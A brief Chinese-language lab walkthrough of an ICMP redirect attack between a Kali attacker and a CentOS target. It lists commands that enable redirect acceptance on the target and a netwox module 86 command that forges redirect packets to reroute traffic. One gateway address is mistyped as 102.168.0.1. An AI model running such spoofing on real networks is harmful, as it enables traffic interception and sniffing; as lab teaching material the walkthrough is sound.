原理

ICMP路由重定向攻击（ICMP Redirect Attack），是指攻击者伪装成路由器发送虚假的ICMP路由路径控制报文，使得目标主机选择攻击者指定的路由路径，从而进行嗅探或假冒攻击的一种技术。

实验环境

靶机：centos 192.168.0.120

攻击机：kali 192.168.0.118

步骤

查看centos中的路由表：

route –C -n

可以看到正常网关地址是102.168.0.1

linux系统中，默认不接受ICMP重定向报文。所以应该将0设置为1，就可进行ICMP重定向攻击。

echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

echo 1 > /proc/sys/net/ipv4/conf/ens33/accept_redirects

echo 1 > /proc/sys/net/ipv4/conf/default/accept_redirects

这里要注意网卡是eth0还是ens33

使用netwox中86号模块发起ICMP路由重定向攻击

netwox 86 -g 192.168.0.118 -i 192.168.0.1

-g伪造路由ip(kali ip)

-i原路由ip

然后用centos去ping一下百度

可以看到已经重定向了